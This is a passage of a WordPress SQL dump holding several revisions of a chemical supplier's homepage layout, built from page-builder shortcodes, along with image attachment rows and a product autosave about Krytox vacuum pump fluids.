INSERT INTO `wp_posts` VALUES (1621, 2, '2016-09-13 18:01:43', '2016-09-13 18:01:43', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font"><em>INTRODUCING</em></h4>\n[divider]\n\n<h1>ReleaSys<strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 18:01:43', '2016-09-13 18:01:43', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1622, 2, '2016-09-13 18:07:11', '2016-09-13 18:07:11', '', 'vazo-logo', '', 'inherit', 'open', 'closed', '', 'vazo-logo-2', '', '', '2016-09-13 18:07:11', '2016-09-13 18:07:11', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Vazo-logo-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1623, 2, '2016-09-13 18:08:15', '2016-09-13 18:08:15', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font"><em>INTRODUCING</em></h4>\n[divider]\n\n<h1>ReleaSys<strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1622"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 18:08:15', '2016-09-13 18:08:15', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1624, 2, '2016-09-13 18:10:52', '2016-09-13 18:10:52', '', 'vazo-logo', '', 'inherit', 'open', 'closed', '', 'vazo-logo-3', '', '', '2016-09-13 18:10:52', '2016-09-13 18:10:52', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Vazo-logo-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1625, 2, '2016-09-13 18:11:56', '2016-09-13 18:11:56', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font"><em>INTRODUCING</em></h4>\n[divider]\n\n<h1>ReleaSys<strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 18:11:56', '2016-09-13 18:11:56', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1626, 2, '2016-09-13 18:19:24', '2016-09-13 18:19:24', '', '1525', 'Krytox vacuum pump fluids (VPF) are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems. \n', 'inherit', 'closed', 'closed', '', '954-autosave-v1', '', '', '2016-09-13 18:19:24', '2016-09-13 18:19:24', '', 954, 'https://132.148.10.86/wordpress/954-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1627, 3, '2016-09-13 18:19:47', '2016-09-13 18:19:47', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 18:19:47', '2016-09-13 18:19:47', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1628, 3, '2016-09-13 18:23:49', '2016-09-13 18:23:49', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 18:23:49', '2016-09-13 18:23:49', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1629, 3, '2016-09-13 18:25:21', '2016-09-13 18:25:21', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col 